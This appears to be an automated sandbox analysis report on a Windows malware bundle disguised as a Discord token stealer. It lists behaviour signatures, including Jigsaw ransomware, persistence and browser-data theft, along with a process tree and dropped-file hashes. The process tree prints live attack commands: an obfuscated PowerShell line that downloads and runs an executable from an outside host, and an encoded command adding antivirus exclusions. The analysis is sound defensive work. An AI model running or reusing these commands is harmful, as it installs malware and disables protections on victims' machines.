Analysis

  • max time kernel
    49s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 12:21

General

  • Target

    PanKoza2.0DiscordTokenStealer2024.exe

  • Size

    9.5MB

  • MD5

    6c21e9957b540c1fc5c6c30f991423dd

  • SHA1

    3937d74580a14bb8debd9c763fb1816cb26b881d

  • SHA256

    fd6b4896e31a516c1aceae5d2e82822dc0efdecbcebf882b2875e57ce9e26cb0

  • SHA512

    f4b7825e1cd7267b2bc9e8801c19ae72b76a0269dd0fb144303494882eb68bc4f0e2d8b6766f80252b6acd12090a6b6f0c4bc5e2c089d35a24e0a64de2bda5ba

  • SSDEEP

    196608:weurQ4kCMsjWDqYbcMtnpVGNrzUrTg6aXW/aHIFU7s39:C84keyDFcMtpcqI62WO

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://onion1.host:443/temper/PGPClient.exe

Signatures

  • Jigsaw Ransomware

    Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Renames multiple (115) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (462) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 21 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks registry for disk virtualization 3 TTPs 1 IoCs

    Detecting virtualization disks is order done to detect sandboxing environments.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 1 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 1 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 41 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 25 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PanKoza2.0DiscordTokenStealer2024.exe
    "C:\Users\Admin\AppData\Local\Temp\PanKoza2.0DiscordTokenStealer2024.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAdgBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQBSAFIATwBSACAANAAwADQAOgAgAEMAYQBuAG4AbwB0ACAAYwBvAG4AbgBlAGMAdAAgAHQAbwAgAHMAZQByAHYAZQByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGoAdQBqACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2216
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeQB6ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Users\Admin\AppData\Local\Temp\CollabVM.exe
      "C:\Users\Admin\AppData\Local\Temp\CollabVM.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2908
    • C:\Users\Admin\AppData\Local\Temp\yababi.exe
      "C:\Users\Admin\AppData\Local\Temp\yababi.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Users\Admin\AppData\Local\Temp\yababi.exe
        "C:\Users\Admin\AppData\Local\Temp\yababi.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1496
    • C:\Users\Admin\AppData\Local\Temp\donut.exe
      "C:\Users\Admin\AppData\Local\Temp\donut.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Users\Admin\AppData\Local\Temp\33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe
        "C:\Users\Admin\AppData\Local\Temp\33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe"
        3⤵
        • Executes dropped EXE
        • Sets desktop wallpaper using registry
        • System Location Discovery: System Language Discovery
        • Modifies Control Panel
        PID:2344
    • C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe
      "C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
        "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:844
    • C:\Users\Admin\AppData\Local\Temp\OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe
      "C:\Users\Admin\AppData\Local\Temp\OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Users\Admin\AppData\Roaming\mylfhgizta\kxjus.exe
        "C:\Users\Admin\AppData\Roaming\mylfhgizta\kxjus.exe"
        3⤵
        • Executes dropped EXE
        • Checks registry for disk virtualization
        • Maps connected drives based on registry
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Users\Admin\AppData\Roaming\mylfhgizta\kxjus.exe
          "C:\Users\Admin\AppData\Roaming\mylfhgizta\kxjus.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2108
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://195.5.161.187/check_install.php?mc=C28ADB222BBA&adv=235&sub=0&dk=61CC6C9C2F1DAE030FFB522410000A4D5C739AEAE91A2A562BA5C32182DC1A58AC
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          PID:892
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:888
    • C:\Users\Admin\AppData\Local\Temp\Windows Service.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Service.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2724
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\244b4205acb416700bec459c8b36be379c0b7e3d2a21a57c4a121ba95d229bc4.doc"
      2⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:324
      • C:\Windows\SysWOW64\CmD.ExE
        CmD.ExE /c "PO^wE^rsh^ELL^.eXE ^-Exe^cU^TIoNpoLICy bYp^ass^ -N^OPrOfI^Le -^WinD^o^wS^T^YlE ^HID^De^N^ (NeW^-^oBJE^c^t SYs^t^e^M.N^E^T^.w^e^bC^LI^ENt)^.^D^OwnLOa^DFI^lE('http://onion1.host:443/temper/PGPClient.exe','%apPDaTa%.eXe');STa^R^T-^Pr^ocES^S '%appdAta%.EXE'"
        3⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          POwErshELL.eXE -ExecUTIoNpoLICy bYpass -NOPrOfILe -WinDowSTYlE HIDDeN (NeW-oBJEct SYsteM.NET.webCLIENt).DOwnLOaDFIlE('http://onion1.host:443/temper/PGPClient.exe','C:\Users\Admin\AppData\Roaming.eXe');STaRT-ProcESS 'C:\Users\Admin\AppData\Roaming.EXE'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1348
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:2720

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun

      Filesize

      160B

      MD5

      000e8c41d4a15fb34d0be0dbb56e3778

      SHA1

      00c4eae64ee6239d7c65d819c6ce1ac329224f8c

      SHA256

      8bdfa6a5b7de345cf0d4fe0e9c17d8b0e9db26d58b05b1b2ebbb3a05a068ff28

      SHA512

      775d832eb8ab73e4a93789917dca69edb6c91fbb426e02acf7c6e213ffb4575776187209d1c471fbf57c4621ea3c23d9850f6dfc2770d62c17de9d66710800af

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      5ebbd87cb33a100182af3f487d7a0896

      SHA1

      26380a31dc9515f6fc45848e8b4005cfe6158177

      SHA256

      d5553c9a304cb2731094fea6c377a91859839220d08e0dabb19ef88c10c7a606

      SHA512

      0fa55224b798d92e40fe2bb24f6cf0f53fe1654ebf5d9fecdcf4cbaf71aa4ea888e316c3977b0d63b15cfddb4f5bd022f1917c975b4d8f0a7599e1184dfdc1d4

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      16810d45519dbc603686348df86f5a57

      SHA1

      0ea637fc02e58c578d83e03a7f5cd6a18ea6df54

      SHA256

      169dd60daa48132b3d79dad4ae6549726f46eaa1331390db4eb06736206cb9e0

      SHA512

      136929286b3ac3c1305ffd5c2b4200d959128d681740e172a3591a2028c412ef7b0cf684c95e8c948b078269dfe5c93daf48a3f9335e04e78c88d68e71bc24a7

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      2cedd4365a0974bd8988c16256d29884

      SHA1

      9f6150f13ac75d479f69e7cfd860ff9cb61fdd3a

      SHA256

      dc41b84b268241061dbfdbb4e0223c3e24e5016bf524f4fba3fc2cbb312ffd69

      SHA512

      e2d5ddd4330bb4da984f06ba13ff51ffb09be23fc316ffcff99a7029b83209859cc0983a982809e37228a9dafb6ea1eac159f9b0ba9e27aa6f28c47dfba0b6c9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      ca048ed98e61d8216f8a8bee82408bfa

      SHA1

      0560b10e7aafc890a1b105586876c24d61ac9b24

      SHA256

      18ef6b0af9bf84f2f9005564482a39c8dbf9fcd9ef18598173d921b973fa696a

      SHA512

      26c214f05da5399f5fe4c5e08635b10328575a96e16f9347a2dda5e0dd05aabef617c75e3530a6fa64fcf2e4d4d8f630160e5242b922d62bbe7cdda0e8c80776

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      a9166998c59840dc4b386ffd5487c093

      SHA1

      37c5a0053c6e2d0aada11b97f6b0d9855b3c6d21

      SHA256

      e8ba6822f85efd60925e14a8083192d4e15b115fa26e2ff4f8a47d04b4df5429

      SHA512

      ee2c98062c365ba67c471724a9f1a4252ef3663638fef8123271619146316224a84192482f06db7133f696340cc78e8d4e473f72c61e1e5399e38b8792298995

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      de6451207ebb1b4c7d20e97da6e93eb0

      SHA1

      4687bdbba3076f4838908db9da21f3437736dc78

      SHA256

      b496ca69900f45fd26856914e407f66d536f675a565c5eeb788a750c6426f03d

      SHA512

      384f6a80a824f8faa1091e5d6516d015f46c1f9efca03ec3aedb8a54443ec9375804edbf777aa90ef62f0a681d2d23eae79dc12202a43f9b3c9e74054f72adce

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      737b9f9e271749ec6896a4bb2fc1fbc3

      SHA1

      eba93209f3b3275e7efca913830c7b3d5b610ca9

      SHA256

      f00f59599e7a15cb0a33c979da32c8be01064f6bf0e644143a14d41d9d9fe50c

      SHA512

      9ab14bf3e70f9acd3f3dc0b8f9b368129144d4bc6e982b3232aa71a908a7283c8c3b0c9f00b482cef4d2dfae91c398afe02a528f58c970b8fb5feebd02d8ee6c

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      c95723788c613d0565fbbac863da9caf

      SHA1

      da3bd05380269946e586ee6a12845820b1bba74b

      SHA256

      a05c2cee589d5471a7dc8a469cb67852f64b274898041dac8428c5aa203ba379

      SHA512

      e14f2a3506998823ed10aa9a4658abf5036faf4e1dca1de927161b465e43c9341f0c3e4e2a2ed212b759598687c8f77c18a384c9f8d19d6283997105c5ef4f0b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      f25f0df31bb5579e0ad7d1ab29943b43

      SHA1

      429f6f0fb4ea75dc2f1a026a39899d33d3693868

      SHA256

      6c5c804575185eb69ae694d7435f1cb0cdb9227804729686cbcba6ab0adb18fa

      SHA512

      a5ea1a8b32d07c1a93a33fceba962ea3a4e7c287052502cb2e0697aa426e25df61af4377cd5293bdfceb0db160be6ae9dd29f9ed3e32a930bd7ad94c464c7a7f

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      fab0a4126349fa02779fdd04c96df0dc

      SHA1

      49a19e912cee2a839ea7dadb7d897f3b89554554

      SHA256

      b8b444678de7bfa10bb5f18b8ace279fef95ebb83bec0ba178c8370ac2b020b1

      SHA512

      1979f9619a405dd4b92c662986c3264134dd9d5a18602106ff4d27fd73b672d5f04b4b6b2798f634b4189efeb0f44ba9e70fcd509cbec31f1ad5caae673238eb

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      fb1aebc9577654419b2d2a272284b9d3

      SHA1

      61b4190fcf2a934220b46554ba21e161ef093ec9

      SHA256

      6a319e99643e7648d646dbd16e361ef8599aa585125bd977d87ce5c4d9ee91a7

      SHA512

      f206ba629f12eeb85e53be3935d1f68aca5f18df106969ff03607be01879dfb1a3c81a0912e6809f7b5c4607f47907d093f02cfab9a3bca6fb364a489d228712

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      eb0747eb8eb857b5b016067c527ce401

      SHA1

      f0ab7254b9e35d2831809cdbd4ca7d736d108011

      SHA256

      96a6c798ca1ac544c3ba245cb1c7b2b0f7165a51589e007b808befbd1e86176c

      SHA512

      15adda30da4b7839f0cc632d9be81357d717a3783d201c4c0d75b987077521531100f0048d4fd920d3dc25b2911c209907ed7521b27abbcb775d9e46dd8c7d22

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      a8f8c7264756d7c0b45b6a49e8ef75c2

      SHA1

      1fcf429874540e9bd616d11fefa051cec12fec54

      SHA256

      70ec73d00738dc465a68810f0a04030412dc9fdca1fbcf3149b50aecb821ce1a

      SHA512

      607ccd58acb2304d44ea16618d418322ac0b08a2a1550e550cf2bbcb9868026597a3bdad43c93b7d42518077fe69f091458de1ac3ce5302ee4f4cee751cd7281

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      67e7ac61a1e1b9c92a469e484cf01c25

      SHA1

      919f37d4ed43f2601bf6340a74daaebc42d8bf1b

      SHA256

      d3ffceca52936e5506ddfb4d8c3d6e0548f346199f56212ffcff5bf713524f37

      SHA512

      af3f9fad3cf7d94e8d5308593e1ead488f40bba522815d5bd37e5240abba4f2cc2bf7c18617dfbe8251fc80075938c7736ddf9759fff64a6c8e7150c95777542

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      28110c92c8a759421212abedf093183c

      SHA1

      15d9dbabaa1a257a127a768f655476b008f8f81d

      SHA256

      a20dcbd9a1b571d68e7a3b30b955fea4b1b84e1624d46168b8373f6f0cb0d030

      SHA512

      ee1411afa518da4ca3b6e3e9d778913d81464f44f72d8440489a3a5a264e01f307d86d485d7ffd41c774588d497f58dcee04a917e5a2bf9b2453dafdcfd6de4d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      b49335de68010741ce2b894dbe28ba5f

      SHA1

      8d2ad5bc0ce83874e287e7cfc6970f8a1b56e706

      SHA256

      9b38745a806c38b5dea1b44982587bb3e1d6620773da9e66ff55bae769e2cfbe

      SHA512

      2226b5e7a2ac2e3af6355379da3a11e0ad9dc30c8ab50d2ee158bea2af6e746002feb7abf3bf15a38cc6ca8087128a1d94568a69757feca6af3137aa785e9afe

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      5b8f353eb1b8a5d880b8b9e361ab6438

      SHA1

      a2ee65da63fd091e96a37335e02888858bca95ba

      SHA256

      bb4b109abedd77f07109d5bafa0d6a23b3781272545c7a6655b6cac93266144e

      SHA512

      40bf0a92625ed610e8f40ec9ed7e5d0d012f297239df9d4e669810ee7ccdabe554d47c7bd477f286f4f26f640ef1ba5ae9e72bccaedeb5b9ec47747b3e9d79de

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      37e04be927db63940354384c06ac12d6

      SHA1

      5206992f1c9239f9322b0ca83f8c6c42b2c10fd4

      SHA256

      c5689a4a56fb43227b0c9d55e039567f9e70e3cc73bedfc1abaacf13a12f7cf0

      SHA512

      a3e3cf14c68fed42a5d214e80c93f82e523c3e91ddd9b691786e5ad0eb3c795f1021ce76f993e4bfcb23c22e4f9c29c77b42854792bc717b0083b862921dc306

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      7a6d6fbaa34b6211af74b35ed257e47c

      SHA1

      e00a09e5e393b3d4eb7a1f655410337d43f65880

      SHA256

      37cfe800d0e85770e647cc035cc2b41abaceb39e806a49f19371273eadd7773f

      SHA512

      72147fc3a19dbdcc0ce7566b7ebe5ce5102ae8c4c19c50632ac173e3c2960120835a3a721d9cab5e3be413477923c228500f6f25cb4b8aeafca2119e62ed96c4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\es5-shims.min[1].js

      Filesize

      2KB

      MD5

      61fb64030345b7272ccd9a9df3af593b

      SHA1

      2fbd95d710e31a3aa85907c3386e4f9c698fa64c

      SHA256

      8f6a2327c55ab5b9ca185e4eaa4aad83bd56641f64af8dd45bc5bc9d8a150c5a

      SHA512

      67c97ad81c807c531bcaaa82f78d5d69e0783b1cf3d3d0982ebc04e9c09b59e283b6acbc1ecdcfda34dc12dcc64af65f2022ff8c3f056008352c4ee8e6a38038

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\mHKFU0xrjazG12WFrJAo4IVfU[1].js

      Filesize

      362KB

      MD5

      cc0370d357f19d598c476fea627ecf41

      SHA1

      7cf987285534c6b8dacc6d76585ac9028e0855f5

      SHA256

      a46edd61c9472c0c85847d0d3b26e15a5b0dc0c0a57172194fdb04cfde9ab485

      SHA512

      2966ca579446c80ab133277cbd8480466de498fab9566e23e82e8b47281cf7082eebf0318a1e67f165140a02f5b0b77a969ac24029407b796387bd636914ec0a

    • C:\Users\Admin\AppData\Local\Temp\244b4205acb416700bec459c8b36be379c0b7e3d2a21a57c4a121ba95d229bc4.doc

      Filesize

      47KB

      MD5

      1a7d5e0fe2288a2fd4910c685b9142b3

      SHA1

      63a5e7851c9146554e2e5cef467f7d78c734169a

      SHA256

      244b4205acb416700bec459c8b36be379c0b7e3d2a21a57c4a121ba95d229bc4

      SHA512

      e1c31ab879a2fe5d2970fdbab9deed3fffeab358d9ea72407927591139857bd7b784e1275a77c716a23eb2a49e6a5fbc1b614ef1e3f517c9a62e99f16262a57d

    • C:\Users\Admin\AppData\Local\Temp\33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe

      Filesize

      14KB

      MD5

      f5289f5e2b26356e63f90a07055d3394

      SHA1

      b45c93ff2db91b192698d9ac7b6bcabdc6857e3b

      SHA256

      b7b4a5f4a857b3ae0c9bdd64f5408d562657bf6d993003f50b5d39094dcf476b

      SHA512

      174c21ed3db973b5fa813950ac436294850e0791a74f945a99bb283a3516ab9eaf2e93b214b4ccb0c0dec131a292e9aea2cde45ba735d5e9d65077f6cf0c8e0d

    • C:\Users\Admin\AppData\Local\Temp\Cab4C20.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar4C21.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Local\Temp\Windows Service.exe

      Filesize

      1.1MB

      MD5

      40c0f73c336771dadbaa7df2eb6e61c3

      SHA1

      be4b4cfa72d832933c534de6e5abf43a0a0761fb

      SHA256

      ecfd75a2f55b3cacb535060cd88b88eb9048eb6b00f1220010371ace56375721

      SHA512

      4739c63720d90d11cfd53eea7ed88921a5f27865c44db1d076a996c64924c9ccf1795fbc5f0b80287fe0f6a8b0a4291d66c7f318a5dd231113ba8a4c783e6486

    • C:\Users\Admin\AppData\Local\Temp\_MEI25202\python310.dll

      Filesize

      1.4MB

      MD5

      178a0f45fde7db40c238f1340a0c0ec0

      SHA1

      dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

      SHA256

      9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

      SHA512

      4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

    • C:\Users\Admin\AppData\Local\Temp\donut.exe

      Filesize

      58KB

      MD5

      e76eca2f7d0450c84417a8ac242b424c

      SHA1

      abdb8a43a6d0bf9c60d9cd4223da787c33b341bb

      SHA256

      2f40011df85d75556816ac944d805b6313da44c73c80778af62be5727c005811

      SHA512

      242f6e558fbe5dff48f9ca4776ffe58042741c9569d6b26ef45029dd035b1c61f5ef871d5d1645326fd816a8ef31baf1edac0e55cc4612e6d374bf834c144fa6

    • C:\Users\Admin\AppData\Local\Temp\jigsaw_ransom.exe

      Filesize

      320KB

      MD5

      876d424bdfef69c9ae639da6664f9f13

      SHA1

      cb5bc53cd90084973dd17ab28ddcb117f6f806d0

      SHA256

      65a30d08f4a41ad90927d9a5a8ff68349a7c46fd7aa09e2cc999db6e4e26d5b3

      SHA512

      6e265dbcc4897f457d3c3302eb6483c9be75682463ce11e920510d44b67543e3f3fbd48707709de6de14f5c8f98d2f325125d63cf28c3f17c44a666d064c2ca6

    • C:\Users\Admin\AppData\Local\Temp\wallpaper.bmp

      Filesize

      4.0MB

      MD5

      9dbbeea6df198d3356d7f5d8523d65d3

      SHA1

      b11f13d21fe2f8dfb28185fad2d007239ea9114d

      SHA256

      d4e4b75e7ef405afc343ab747b232ce3bef8852df204d072ae98355f45ccc9ff

      SHA512

      35df7e0a2ff626370eb30044ef761b99c35ddf64c430b479a891e64ad305fbfc75a6c2e232e7b875437dbc819077d41babef5dd9844c6bb32162c94201ffbb31

    • C:\Users\Admin\AppData\Local\Temp\~$4b4205acb416700bec459c8b36be379c0b7e3d2a21a57c4a121ba95d229bc4.doc

      Filesize

      162B

      MD5

      cff1ca5e3f4c0f2eaa457be1371de3cd

      SHA1

      02d76b6a57136c96181279ce13742708ab7605cb

      SHA256

      356a71de20313cd6d97d1d7438359325725b3b10761520186b02232672665153

      SHA512

      0c7794541ee996b668691484d084377bef6b4e2ee65ac25f39c7c72598703d754f5416ca393629fb01c9ecdae85d59fbbded78e4c7e95844ee496299e2cb6bc2

    • C:\Users\Admin\AppData\Roaming\AVDefender2011\history.dat

      Filesize

      274B

      MD5

      5626b687940b9130ae2c8a62368f142d

      SHA1

      19192e1c00401ed5be4c90187a71963617c79ba3

      SHA256

